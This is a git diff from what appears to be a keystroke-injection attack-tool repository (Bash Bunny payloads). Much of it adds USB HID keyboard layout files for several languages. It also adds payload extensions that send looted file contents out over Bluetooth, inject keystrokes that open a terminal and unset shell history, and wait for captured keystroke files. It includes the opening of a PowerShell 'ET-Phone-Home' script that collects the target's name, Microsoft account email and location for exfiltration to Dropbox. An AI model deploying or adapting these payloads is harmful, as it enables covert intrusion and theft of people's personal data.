"(":"02,00,25",
")":"02,00,26",
- ")":"02,00,27",
+ "=":"02,00,27",
"?":"02,00,2d",
"¡":"02,00,2e",
"¨":"02,00,2f",
diff --git a/languages/gb.json b/languages/gb.json
index 2fd45d81..b42ddca0 100644
--- a/languages/gb.json
+++ b/languages/gb.json
@@ -56,6 +56,7 @@
"ENTER":"00,00,28",
"ESC":"00,00,29",
"ESCAPE":"00,00,29",
+ "BACKSPACE":"00,00,2a",
"TAB":"00,00,2b",
" ":"00,00,2c",
"SPACE":"00,00,2c",
@@ -64,6 +65,7 @@
"[":"00,00,2f",
"]":"00,00,30",
"#":"00,00,31",
+ "__comment":"MIA K42 00,00,32",
";":"00,00,33",
"'":"00,00,34",
"`":"00,00,35",
@@ -102,10 +104,26 @@
"DOWNARROW":"00,00,51",
"UP":"00,00,52",
"UPARROW":"00,00,52",
+ "NUMLOCK":"00,00,53",
+ "KPAD_SLASH":"00,00,54",
+ "KPAD_ASTERISK":"00,00,55",
+ "KPAD_MINUS":"00,00,56",
+ "KPAD_PLUS":"00,00,57",
+ "KPAD_ENTER":"00,00,58",
+ "KPAD_1":"00,00,59",
+ "KPAD_2":"00,00,5a",
+ "KPAD_3":"00,00,5b",
+ "KPAD_4":"00,00,5c",
+ "KPAD_5":"00,00,5d",
+ "KPAD_6":"00,00,5e",
+ "KPAD_7":"00,00,5f",
+ "KPAD_8":"00,00,60",
+ "KPAD_9":"00,00,61",
+ "KPAD_0":"00,00,62",
+ "KPAD_DOT":"00,00,63",
"\\":"00,00,64",
"APP":"00,00,65",
"MENU":"00,00,65",
- "ALT-TAB":"00,00,71",
"CONTROL":"01,00,00",
"CTRL":"01,00,00",
"SHIFT":"02,00,00",
@@ -137,6 +155,7 @@
"Z":"02,00,1d",
"!":"02,00,1e",
"\"":"02,00,1f",
+ "£":"02,00,20",
"$":"02,00,21",
"%":"02,00,22",
"^":"02,00,23",
@@ -151,19 +170,26 @@
"~":"02,00,31",
":":"02,00,33",
"@":"02,00,34",
+ "¬":"02,00,35",
"<":"02,00,36",
">":"02,00,37",
"?":"02,00,38",
"|":"02,00,64",
"CTRL-SHIFT":"03,00,00",
"ALT":"04,00,00",
+ "ALT-TAB":"04,00,2b",
"CTRL-ALT":"05,00,00",
"ALT-SHIFT":"06,00,00",
- "COMMAND":"08,00,00",
"GUI":"08,00,00",
"WINDOWS":"08,00,00",
- "COMMAND-OPTION":"12,00,00",
- "COMMAND-CTRL-SHIFT":"12,00,00",
- "COMMAND-CTRL":"12,00,00",
- "COMMAND-OPTION-SHIFT'":"12,00,00"
+ "COMMAND":"08,00,00",
+ "COMMAND-CTRL":"09,00,00",
+ "COMMAND-CTRL-SHIFT":"0b,00,00",
+ "COMMAND-OPTION":"0c,00,00",
+ "COMMAND-OPTION-SHIFT'":"0e,00,00",
+ "ALTGR":"40,00,00",
+ "ALTGR-TAB":"40,00,2b",
+ "¦":"40,00,35",
+ "CTRL-ALTGR":"41,00,00",
+ "ALTGR-SHIFT":"42,00,00"
}
\ No newline at end of file
diff --git a/languages/hu.json b/languages/hu.json
new file mode 100644
index 00000000..71cae1fd
--- /dev/null
+++ b/languages/hu.json
@@ -0,0 +1,187 @@
+{
+ "__comment":"All numbers here are in hex format and 0x is ignored.",
+ "__comment":" ",
+ "__comment":"This list is in ascending order of 3rd byte (HID Usage ID).",
+ "__comment":" See section 10 Keyboard/Keypad Page (0x07)",
+ "__comment":" of document USB HID Usage Tables Version 1.12.",
+ "__comment":" ",
+ "__comment":"Definition of these 3 bytes can be found",
+ "__comment":" in section B.1 Protocol 1 (Keyboard)",
+ "__comment":" of document Device Class Definition for HID Version 1.11",
+ "__comment":" - byte 1: Modifier keys",
+ "__comment":" - byte 2: Reserved",
+ "__comment":" - byte 3: Keycode 1",
+ "__comment":" ",
+ "__comment":"Both documents can be obtained from link here",
+ "__comment":" http://www.usb.org/developers/hidpage/",
+ "__comment":" ",
+ "__comment":" Hungarian QWERTZ language made by Skeleton022",
+ "__comment":" Added áéíóöőúüűÁÉÍÓÖŐÚÜŰ",
+ "a":"00,00,04",
+ "b":"00,00,05",
+ "c":"00,00,06",
+ "d":"00,00,07",
+ "e":"00,00,08",
+ "f":"00,00,09",
+ "g":"00,00,0a",
+ "h":"00,00,0b",
+ "i":"00,00,0c",
+ "j":"00,00,0d",
+ "k":"00,00,0e",
+ "l":"00,00,0f",
+ "m":"00,00,10",
+ "n":"00,00,11",
+ "o":"00,00,12",
+ "p":"00,00,13",
+ "q":"00,00,14",
+ "r":"00,00,15",
+ "s":"00,00,16",
+ "t":"00,00,17",
+ "u":"00,00,18",
+ "v":"00,00,19",
+ "w":"00,00,1a",
+ "x":"00,00,1b",
+ "z":"00,00,1c",
+ "y":"00,00,1d",
+ "1":"00,00,1e",
+ "2":"00,00,1f",
+ "3":"00,00,20",
+ "4":"00,00,21",
+ "5":"00,00,22",
+ "6":"00,00,23",
+ "7":"00,00,24",
+ "8":"00,00,25",
+ "9":"00,00,26",
+ "ö":"00,00,27",
+ "ENTER":"00,00,28",
+ "ESC":"00,00,29",
+ "ESCAPE":"00,00,29",
+ "TAB":"00,00,2b",
+ " ":"00,00,2c",
+ "SPACE":"00,00,2c",
+ "ü":"00,00,2d",
+ "ó":"00,00,2e",
+ "ő":"00,00,2f",
+ "ú":"00,00,30",
+ "ű":"00,00,31",
+ "é":"00,00,33",
+ "á":"00,00,34",
+ "0":"00,00,35",
+ ",":"00,00,36",
+ ".":"00,00,37",
+ "-":"00,00,38",
+ "CAPSLOCK":"00,00,39",
+ "F1":"00,00,3a",
+ "F2":"00,00,3b",
+ "F3":"00,00,3c",
+ "F4":"00,00,3d",
+ "F5":"00,00,3e",
+ "F6":"00,00,3f",
+ "F7":"00,00,40",
+ "F8":"00,00,41",
+ "F9":"00,00,42",
+ "F10":"00,00,43",
+ "F11":"00,00,44",
+ "F12":"00,00,45",
+ "PRINTSCREEN":"00,00,46",
+ "SCROLLLOCK":"00,00,47",
+ "BREAK":"00,00,48",
+ "PAUSE":"00,00,48",
+ "INSERT":"00,00,49",
+ "HOME":"00,00,4a",
+ "PAGEUP":"00,00,4b",
+ "DEL":"00,00,4c",
+ "DELETE":"00,00,4c",
+ "END":"00,00,4d",
+ "PAGEDOWN":"00,00,4e",
+ "RIGHT":"00,00,4f",
+ "RIGHTARROW":"00,00,4f",
+ "LEFT":"00,00,50",
+ "LEFTARROW":"00,00,50",
+ "DOWN":"00,00,51",
+ "DOWNARROW":"00,00,51",
+ "UP":"00,00,52",
+ "UPARROW":"00,00,52",
+ "í":"00,00,64",
+ "APP":"00,00,65",
+ "MENU":"00,00,65",
+ "ALT-TAB":"00,00,71",
+ "CONTROL":"01,00,00",
+ "CTRL":"01,00,00",
+ "SHIFT":"02,00,00",
+ "A":"02,00,04",
+ "B":"02,00,05",
+ "C":"02,00,06",
+ "D":"02,00,07",
+ "E":"02,00,08",
+ "F":"02,00,09",
+ "G":"02,00,0a",
+ "H":"02,00,0b",
+ "I":"02,00,0c",
+ "J":"02,00,0d",
+ "K":"02,00,0e",
+ "L":"02,00,0f",
+ "M":"02,00,10",
+ "N":"02,00,11",
+ "O":"02,00,12",
+ "P":"02,00,13",
+ "Q":"02,00,14",
+ "R":"02,00,15",
+ "S":"02,00,16",
+ "T":"02,00,17",
+ "U":"02,00,18",
+ "V":"02,00,19",
+ "W":"02,00,1a",
+ "X":"02,00,1b",
+ "Z":"02,00,1c",
+ "Y":"02,00,1d",
+ "'":"02,00,1e",
+ "\"":"02,00,1f",
+ "+":"02,00,20",
+ "!":"02,00,21",
+ "%":"02,00,22",
+ "/":"02,00,23",
+ "=":"02,00,24",
+ "(":"02,00,25",
+ ")":"02,00,26",
+ "Ö":"02,00,27",
+ "Ü":"02,00,2d",
+ "Ó":"02,00,2e",
+ "Ő":"02,00,2f",
+ "Ú":"02,00,30",
+ "Ű":"02,00,31",
+ "É":"02,00,33",
+ "Á":"02,00,34",
+ "?":"02,00,36",
+ ":":"02,00,37",
+ "_":"02,00,38",
+ "Í":"02,00,64",
+ "CTRL-SHIFT":"03,00,00",
+ "ALT":"04,00,00",
+ "CTRL-ALT":"05,00,00",
+ "ALT-SHIFT":"06,00,00",
+ "COMMAND":"08,00,00",
+ "GUI":"08,00,00",
+ "WINDOWS":"08,00,00",
+ "COMMAND-OPTION":"12,00,00",
+ "COMMAND-CTRL-SHIFT":"12,00,00",
+ "COMMAND-CTRL":"12,00,00",
+ "COMMAND-OPTION-SHIFT'":"12,00,00",
+ "{":"40,00,05",
+ "&":"40,00,06",
+ "[":"40,00,09",
+ "]":"40,00,0a",
+ "}":"40,00,11",
+ "\\":"40,00,14",
+ "@":"40,00,19",
+ "|":"40,00,1a",
+ "#":"40,00,1b",
+ ">":"40,00,1d",
+ "~":"40,00,1e",
+ "^":"40,00,20",
+ "`":"40,00,24",
+ "$":"40,00,33",
+ ";":"40,00,36",
+ "*":"40,00,38",
+ "<":"40,00,64"
+}
diff --git a/languages/jp.json b/languages/jp.json
new file mode 100644
index 00000000..9c3506fa
--- /dev/null
+++ b/languages/jp.json
@@ -0,0 +1,172 @@
+{
+ "__comment": "All numbers here are in hex format and 0x is ignored.",
+ "__comment": " ",
+ "__comment": "This list is in ascending order of 3rd byte (HID Usage ID).",
+ "__comment": " See section 10 Keyboard/Keypad Page (0x07)",
+ "__comment": " of document USB HID Usage Tables Version 1.12.",
+ "__comment": " ",
+ "__comment": "Definition of these 3 bytes can be found",
+ "__comment": " in section B.1 Protocol 1 (Keyboard)",
+ "__comment": " of document Device Class Definition for HID Version 1.11",
+ "__comment": " - byte 1: Modifier keys",
+ "__comment": " - byte 2: Reserved",
+ "__comment": " - byte 3: Keycode 1",
+ "__comment": " ",
+ "__comment": "Both documents can be obtained from link here",
+ "__comment": " http://www.usb.org/developers/hidpage/",
+ "__comment": " ",
+ "__comment": "A = LeftShift + a, { = LeftShift + [",
+ "__comment": " ",
+ "CTRL": "01,00,00",
+ "CONTROL": "01,00,00",
+ "SHIFT": "02,00,00",
+ "ALT": "04,00,00",
+ "GUI": "08,00,00",
+ "WINDOWS": "08,00,00",
+ "CTRL-ALT": "05,00,00",
+ "CTRL-SHIFT": "03,00,00",
+ "ALT-SHIFT": "06,00,00",
+ "__comment": "Below 5 key combinations are for Mac OSX",
+ "__comment": "Example: (COMMAND-OPTION SHIFT t) to open terminal",
+ "COMMAND": "08,00,00",
+ "COMMAND-CTRL": "09,00,00",
+ "COMMAND-CTRL-SHIFT": "0B,00,00",
+ "COMMAND-OPTION": "0C,00,00",
+ "COMMAND-OPTION-SHIFT": "0E,00,00",
+ "a": "00,00,04",
+ "A": "02,00,04",
+ "b": "00,00,05",
+ "B": "02,00,05",
+ "c": "00,00,06",
+ "C": "02,00,06",
+ "d": "00,00,07",
+ "D": "02,00,07",
+ "e": "00,00,08",
+ "E": "02,00,08",
+ "f": "00,00,09",
+ "F": "02,00,09",
+ "g": "00,00,0a",
+ "G": "02,00,0a",
+ "h": "00,00,0b",
+ "H": "02,00,0b",
+ "i": "00,00,0c",
+ "I": "02,00,0c",
+ "j": "00,00,0d",
+ "J": "02,00,0d",
+ "k": "00,00,0e",
+ "K": "02,00,0e",
+ "l": "00,00,0f",
+ "L": "02,00,0f",
+ "m": "00,00,10",
+ "M": "02,00,10",
+ "n": "00,00,11",
+ "N": "02,00,11",
+ "o": "00,00,12",
+ "O": "02,00,12",
+ "p": "00,00,13",
+ "P": "02,00,13",
+ "q": "00,00,14",
+ "Q": "02,00,14",
+ "r": "00,00,15",
+ "R": "02,00,15",
+ "s": "00,00,16",
+ "S": "02,00,16",
+ "t": "00,00,17",
+ "T": "02,00,17",
+ "u": "00,00,18",
+ "U": "02,00,18",
+ "v": "00,00,19",
+ "V": "02,00,19",
+ "w": "00,00,1a",
+ "W": "02,00,1a",
+ "x": "00,00,1b",
+ "X": "02,00,1b",
+ "y": "00,00,1c",
+ "Y": "02,00,1c",
+ "z": "00,00,1d",
+ "Z": "02,00,1d",
+ "1": "00,00,1e",
+ "!": "02,00,1e",
+ "2": "00,00,1f",
+ "\"": "02,00,1f",
+ "3": "00,00,20",
+ "#": "02,00,20",
+ "4": "00,00,21",
+ "$": "02,00,21",
+ "5": "00,00,22",
+ "%": "02,00,22",
+ "6": "00,00,23",
+ "&": "02,00,23",
+ "7": "00,00,24",
+ "'": "02,00,24",
+ "8": "00,00,25",
+ "(": "02,00,25",
+ "9": "00,00,26",
+ ")": "02,00,26",
+ "0": "00,00,27",
+ "ENTER": "00,00,28",
+ "ESC": "00,00,29",
+ "ESCAPE": "00,00,29",
+ "BACKSPACE": "00,00,2a",
+ "TAB": "00,00,2b",
+ "ALT-TAB": "04,00,2b",
+ "SPACE": "00,00,2c",
+ " ": "00,00,2c",
+ "-": "00,00,2d",
+ "=": "02,00,2d",
+ "^": "00,00,2e",
+ "~": "02,00,2e",
+ "@": "00,00,2f",
+ "`": "02,00,2f",
+ "[": "00,00,30",
+ "{": "02,00,30",
+ "\\": "00,00,31",
+ "|": "02,00,31",
+ "]": "00,00,32",
+ "}": "02,00,32",
+ ";": "00,00,33",
+ "+": "02,00,33",
+ ":": "00,00,34",
+ "*": "02,00,34",
+ ",": "00,00,36",
+ "<": "02,00,36",
+ ".": "00,00,37",
+ ">": "02,00,37",
+ "/": "00,00,38",
+ "?": "02,00,38",
+ "CAPSLOCK": "00,00,39",
+ "F1": "00,00,3a",
+ "F2": "00,00,3b",
+ "F3": "00,00,3c",
+ "F4": "00,00,3d",
+ "F5": "00,00,3e",
+ "F6": "00,00,3f",
+ "F7": "00,00,40",
+ "F8": "00,00,41",
+ "F9": "00,00,42",
+ "F10": "00,00,43",
+ "F11": "00,00,44",
+ "F12": "00,00,45",
+ "PRINTSCREEN":"00,00,46",
+ "SCROLLLOCK": "00,00,47",
+ "PAUSE": "00,00,48",
+ "BREAK": "00,00,48",
+ "INSERT": "00,00,49",
+ "HOME": "00,00,4a",
+ "PAGEUP": "00,00,4b",
+ "DELETE": "00,00,4c",
+ "DEL": "00,00,4c",
+ "END": "00,00,4d",
+ "PAGEDOWN": "00,00,4e",
+ "RIGHTARROW": "00,00,4f",
+ "RIGHT": "00,00,4f",
+ "LEFTARROW": "00,00,50",
+ "LEFT": "00,00,50",
+ "DOWNARROW": "00,00,51",
+ "DOWN": "00,00,51",
+ "UPARROW": "00,00,52",
+ "UP": "00,00,52",
+ "NUMLOCK": "00,00,53",
+ "MENU": "00,00,65",
+ "APP": "00,00,65"
+}
diff --git a/languages/no.json b/languages/no.json
index 6db1c2c6..008c7313 100644
--- a/languages/no.json
+++ b/languages/no.json
@@ -43,6 +43,9 @@
"x":"00,00,1b",
"y":"00,00,1c",
"z":"00,00,1d",
+ "æ":"00,00,34",
+ "ø":"00,00,33",
+ "å":"00,00,2f",
"1":"00,00,1e",
"2":"00,00,1f",
"3":"00,00,20",
@@ -131,6 +134,9 @@
"X":"02,00,1b",
"Y":"02,00,1c",
"Z":"02,00,1d",
+ "Æ":"02,00,34",
+ "Ø":"02,00,33",
+ "Å":"02,00,2f",
"!":"02,00,1e",
"\"":"02,00,1f",
"#":"02,00,20",
diff --git a/languages/tr.json b/languages/tr.json
new file mode 100644
index 00000000..77c63de4
--- /dev/null
+++ b/languages/tr.json
@@ -0,0 +1,173 @@
+{
+ "__comment": "All numbers here are in hex format and 0x is ignored.",
+ "__comment": " ",
+ "__comment": "This list is in ascending order of 3rd byte (HID Usage ID).",
+ "__comment": " See section 10 Keyboard/Keypad Page (0x07)",
+ "__comment": " of document USB HID Usage Tables Version 1.12.",
+ "__comment": " ",
+ "__comment": "Definition of these 3 bytes can be found",
+ "__comment": " in section B.1 Protocol 1 (Keyboard)",
+ "__comment": " of document Device Class Definition for HID Version 1.11",
+ "__comment": " - byte 1: Modifier keys",
+ "__comment": " - byte 2: Reserved",
+ "__comment": " - byte 3: Keycode 1",
+ "__comment": " ",
+ "__comment": "Both documents can be obtained from link here",
+ "__comment": " http://www.usb.org/developers/hidpage/",
+ "__comment": " ",
+ "__comment": "A = LeftShift + a, { = LeftShift + [",
+ "__comment": " ",
+ "CTRL": "01,00,00",
+ "CONTROL": "01,00,00",
+ "SHIFT": "02,00,00",
+ "ALT": "04,00,00",
+ "GUI": "08,00,00",
+ "WINDOWS": "08,00,00",
+ "CTRL-ALT": "05,00,00",
+ "CTRL-SHIFT": "03,00,00",
+ "ALT-SHIFT": "06,00,00",
+ "__comment": "Below 5 key combinations are for Mac OSX",
+ "__comment": "Example: (COMMAND-OPTION SHIFT t) to open terminal",
+ "COMMAND": "08,00,00",
+ "COMMAND-CTRL": "09,00,00",
+ "COMMAND-CTRL-SHIFT": "0B,00,00",
+ "COMMAND-OPTION": "0C,00,00",
+ "COMMAND-OPTION-SHIFT": "0E,00,00",
+ "a": "00,00,04",
+ "A": "02,00,04",
+ "b": "00,00,05",
+ "B": "02,00,05",
+ "c": "00,00,06",
+ "C": "02,00,06",
+ "d": "00,00,07",
+ "D": "02,00,07",
+ "e": "00,00,08",
+ "E": "02,00,08",
+ "f": "00,00,09",
+ "F": "02,00,09",
+ "g": "00,00,0a",
+ "G": "02,00,0a",
+ "h": "00,00,0b",
+ "H": "02,00,0b",
+ "i": "00,00,34",
+ "I": "02,00,0c",
+ "j": "00,00,0d",
+ "J": "02,00,0d",
+ "k": "00,00,0e",
+ "K": "02,00,0e",
+ "l": "00,00,0f",
+ "L": "02,00,0f",
+ "m": "00,00,10",
+ "M": "02,00,10",
+ "n": "00,00,11",
+ "N": "02,00,11",
+ "o": "00,00,12",
+ "O": "02,00,12",
+ "p": "00,00,13",
+ "P": "02,00,13",
+ "q": "00,00,14",
+ "Q": "02,00,14",
+ "r": "00,00,15",
+ "R": "02,00,15",
+ "s": "00,00,16",
+ "S": "02,00,16",
+ "t": "00,00,17",
+ "T": "02,00,17",
+ "u": "00,00,18",
+ "U": "02,00,18",
+ "v": "00,00,19",
+ "V": "02,00,19",
+ "w": "00,00,1a",
+ "W": "02,00,1a",
+ "x": "00,00,1b",
+ "X": "02,00,1b",
+ "y": "00,00,1c",
+ "Y": "02,00,1c",
+ "z": "00,00,1d",
+ "Z": "02,00,1d",
+ "1": "00,00,1e",
+ "!": "02,00,1e",
+ "2": "00,00,1f",
+ "@": "40,00,14",
+ "3": "00,00,20",
+ "#": "40,00,20",
+ "4": "00,00,21",
+ "$": "40,00,21",
+ "5": "00,00,22",
+ "%": "02,00,22",
+ "6": "00,00,23",
+ "^": "02,00,20",
+ "7": "00,00,24",
+ "&": "02,00,23",
+ "8": "00,00,25",
+ "*": "00,00,2d",
+ "9": "00,00,26",
+ "(": "02,00,25",
+ "0": "00,00,27",
+ ")": "02,00,26",
+ "ENTER": "00,00,28",
+ "ESC": "00,00,29",
+ "ESCAPE": "00,00,29",
+ "BACKSPACE": "00,00,2a",
+ "TAB": "00,00,2b",
+ "ALT-TAB": "04,00,2b",
+ "SPACE": "00,00,2c",
+ " ": "00,00,2c",
+ "-": "00,00,2e",
+ "_": "02,00,2e",
+ "=": "02,00,27",
+ "+": "02,00,21",
+ "[": "40,00,25",
+ "{": "40,00,24",
+ "]": "40,00,26",
+ "}": "40,00,27",
+ "\\": "40,00,2d",
+ "|": "40,00,2e",
+ ";": "02,00,31",
+ ":": "02,00,38",
+ "'": "02,00,1f",
+ "\"": "00,00,35",
+ "`": "40,00,31",
+ "~": "40,00,30",
+ ",": "00,00,31",
+ "<": "40,00,35",
+ ".": "00,00,38",
+ ">": "40,00,1e",
+ "/": "02,00,24",
+ "?": "02,00,2d",
+ "CAPSLOCK": "00,00,39",
+ "F1": "00,00,3a",
+ "F2": "00,00,3b",
+ "F3": "00,00,3c",
+ "F4": "00,00,3d",
+ "F5": "00,00,3e",
+ "F6": "00,00,3f",
+ "F7": "00,00,40",
+ "F8": "00,00,41",
+ "F9": "00,00,42",
+ "F10": "00,00,43",
+ "F11": "00,00,44",
+ "F12": "00,00,45",
+ "PRINTSCREEN":"00,00,46",
+ "SCROLLLOCK": "00,00,47",
+ "PAUSE": "00,00,48",
+ "BREAK": "00,00,48",
+ "INSERT": "00,00,49",
+ "HOME": "00,00,4a",
+ "PAGEUP": "00,00,4b",
+ "DELETE": "00,00,4c",
+ "DEL": "00,00,4c",
+ "END": "00,00,4d",
+ "PAGEDOWN": "00,00,4e",
+ "RIGHTARROW": "00,00,4f",
+ "RIGHT": "00,00,4f",
+ "LEFTARROW": "00,00,50",
+ "LEFT": "00,00,50",
+ "DOWNARROW": "00,00,51",
+ "DOWN": "00,00,51",
+ "UPARROW": "00,00,52",
+ "UP": "00,00,52",
+ "NUMLOCK": "00,00,53",
+ "MENU": "00,00,65",
+ "APP": "00,00,65"
+}
diff --git a/payloads/extensions/ble_exfil.sh b/payloads/extensions/ble_exfil.sh
new file mode 100644
index 00000000..47f5ce3d
--- /dev/null
+++ b/payloads/extensions/ble_exfil.sh
@@ -0,0 +1,16 @@
+#!/bin/bash
+#
+# BLE_EXFIL v1 by @drapl0n
+# Exfiltrate data(25 bytes) stored in "/loot/ble_exfil.txt" via BLE.
+# Usage: BLE_EXFIL
+
+function BLE_EXFIL() {
+ stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
+ stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
+ sleep 1
+ text=$(cat /root/udisk/loot/ble_exfil.txt)
+ exfil=${text:0:25}
+ echo -n -e "AT+ADVDAT=$exfil" > /dev/ttyS1
+}
+
+export -f BLE_EXFIL
diff --git a/payloads/extensions/get.sh b/payloads/extensions/get.sh
index 0ebd6e7d..791ad2c0 100755
--- a/payloads/extensions/get.sh
+++ b/payloads/extensions/get.sh
@@ -26,6 +26,10 @@ function GET() {
[[ "${ScanForOS,,}" == *"linux"* ]] && export TARGET_OS='LINUX' && return
export TARGET_OS='UNKNOWN'
;;
+ "BB_LABEL")
+ export BB_LABEL=$(ls -l /dev/disk/by-label/ | awk '/nandf$/ { print $9 }')
+ ;;
+
esac
}
diff --git a/payloads/extensions/linux_mount.sh b/payloads/extensions/linux_mount.sh
new file mode 100644
index 00000000..46b06c3f
--- /dev/null
+++ b/payloads/extensions/linux_mount.sh
@@ -0,0 +1,30 @@
+#!/bin/bash
+#
+# LINUX_MOUNT v1 by @drapl0n
+# Auto mounts BashBunny on GNU/Linux systems.
+# NOTE: Mount path is stored in variable "lmnt".
+# Usage: LINUX_MOUNT - to automatically mount BashBunny.
+# LINUX_UMOUNT - to unmount mounted BashBunny.
+
+function LINUX_MOUNT() {
+ Q CTRL-ALT t
+ Q DELAY 1000
+ Q STRING unset HISTFILE
+ Q ENTER
+ Q DELAY 200
+ Q STRING disk='$(lsblk -fs | grep BashBunny | awk '\'{print\ '$1'}\'\)''
+ Q ENTER
+ Q DELAY 200
+ Q STRING udisksctl mount -b /dev/'$disk'
+ Q ENTER
+ Q DELAY 2000
+ Q STRING lmnt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+ Q ENTER
+ Q DELAY 500
+}
+function LINUX_UMOUNT() {
+ Q STRING udisksctl unmount -b /dev/'$disk'
+ Q ENTER
+ Q DELAY 1000
+}
+export -f LINUX_MOUNT LINUX_UMOUNT
diff --git a/payloads/extensions/wait.sh b/payloads/extensions/wait.sh
index 5219bd06..21cd7e17 100755
--- a/payloads/extensions/wait.sh
+++ b/payloads/extensions/wait.sh
@@ -1,9 +1,8 @@
#!/bin/bash
#
# WAIT v1 by @Hak5Darren
-# Waits blocks the payload from continuing until the switch position has changed
+# Pauses payload until the switch position has changed
# Usage: WAIT
-
function WAIT() {
GET SWITCH_POSITION
TEST=$SWITCH_POSITION
@@ -13,5 +12,43 @@ function WAIT() {
sleep 1
done
}
-
export -f WAIT
+
+
+# WAIT_FOR_LOOT v1 by Korben
+# WAIT_FOR_LOOT (optional)
+#
+# Example: WAIT_FOR_LOOT /root/loot/captured_keys.txt
+# Will return once /root/loot/captured_keys.txt exists
+# OR IF FILE ALREADY EXISTS
+# Will return once the file line count has increased
+
+function WAIT_FOR_LOOT() {
+# Check for refresh interval override
+if [ -z "${2}" ]; then
+ REFRESH_INTERVAL=1
+else
+ REFRESH_INTERVAL=$2
+fi
+
+if [ -f "${1}" ]; then
+ # If file already exists wait for it to change size
+ start_count=$(cat $1|wc -l)
+ while [ $(cat $1|wc -l) -eq $start_count ]; do
+ sleep $REFRESH_INTERVAL
+ done
+else
+ # File doesn't exist, wait for it to be created
+ while [ ! -f "${1}" ]; do
+ sleep $REFRESH_INTERVAL
+ done
+fi
+}
+export -f WAIT_FOR_LOOT
+
+# WAIT_FOR_TARGET_IP v1 by Hak5Darren
+# Pauses payload until target receives IP address
+function WAIT_FOR_TARGET_IP() {
+ until [ ! -z $(cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq) ]; do sleep 1; done
+}
+export -f WAIT_FOR_TARGET_IP
diff --git a/payloads/extensions/wait_for_notpresent.sh b/payloads/extensions/wait_for_notpresent.sh
new file mode 100755
index 00000000..4ef09315
--- /dev/null
+++ b/payloads/extensions/wait_for_notpresent.sh
@@ -0,0 +1,23 @@
+#!/bin/bash
+#
+# WAIT_FOR_NOTPRESENT v1 by @Hak5Darren
+# Pauses payload execution until specified bluetooth identifier IS NOT present
+# Usage: WAIT_FOR_NOTPRESENT devicename
+
+function WAIT_FOR_NOTPRESENT() {
+ stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
+ stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
+ sleep 1
+ echo -n -e "AT+ROLE=2" > /dev/ttyS1
+ echo -n -e "AT+RESET" > /dev/ttyS1
+ while true; do
+ timeout 5s cat /dev/ttyS1 > /tmp/bt_observation
+ if grep -qao $1 /tmp/bt_observation; then
+ echo "$1 found"
+ else
+ break
+ fi
+ done
+}
+
+export -f WAIT_FOR_NOTPRESENT
diff --git a/payloads/extensions/wait_for_present.sh b/payloads/extensions/wait_for_present.sh
new file mode 100755
index 00000000..8080029d
--- /dev/null
+++ b/payloads/extensions/wait_for_present.sh
@@ -0,0 +1,23 @@
+#!/bin/bash
+#
+# WAIT_FOR_PRESENT v1 by @Hak5Darren
+# Pauses payload execution until specified bluetooth identifier IS present
+# Usage: WAIT_FOR_PRESENT devicename
+
+function WAIT_FOR_PRESENT() {
+ stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
+ stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
+ sleep 1
+ echo -n -e "AT+ROLE=2" > /dev/ttyS1
+ echo -n -e "AT+RESET" > /dev/ttyS1
+ while true; do
+ timeout 5s cat /dev/ttyS1 > /tmp/bt_observation
+ if grep -qao $1 /tmp/bt_observation; then
+ break
+ else
+ echo "$1 not found"
+ fi
+ done
+}
+
+export -f WAIT_FOR_PRESENT
diff --git a/payloads/library/Incident_Response/-BB-ET-Phone-Home/ET-Phone-Home.ps1 b/payloads/library/Incident_Response/-BB-ET-Phone-Home/ET-Phone-Home.ps1
new file mode 100644
index 00000000..2cdb7520
--- /dev/null
+++ b/payloads/library/Incident_Response/-BB-ET-Phone-Home/ET-Phone-Home.ps1
@@ -0,0 +1,154 @@
+
+############################################################################################################################################################
+# | ___ _ _ _ # ,d88b.d88b #
+# Title : ET-Phone-Home | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
+# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
+# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
+# Category : Incident-Response | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
+# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
+# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
+# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
+# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
+# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
+#__________________________________|_________________________________________________________________________# | | ) ~ ( #
+# # / \ / ~ \ #
+# github.com/I-Am-Jakoby # \ / \~ ~/ #
+# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
+# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
+# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
+############################################################################################################################################################
+
+<#
+.SYNOPSIS
+ This script is meant to recover your device or as an advanced recon tactic to get sensitive info on your target
+
+.DESCRIPTION
+ This program is used to locate your stolen cable. Or perhaps locate your "stolen" cable if you left it as bait.
+ This script will get the Name and email associated with the targets microsoft account
+ Their geo-location will also be grabbed giving you the latitude and longitude of where your device was activated
+#>
+
+#------------------------------------------------------------------------------------------------------------------------------------
+
+$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_Device-Location.txt"
+
+# Your dropbox access token to exfiltrate information to
+
+$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN"
+
+ #------------------------------------------------------------------------------------------------------------------------------------
+
+ function Get-fullName {
+
+ try {
+
+ $fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
+
+ }
+
+ # If no name is detected function will return $env:UserName
+
+ # Write Error is just for troubleshooting
+ catch {Write-Error "No name was detected"
+ return $env:UserName
+ -ErrorAction SilentlyContinue
+ }
+
+ return $fullName
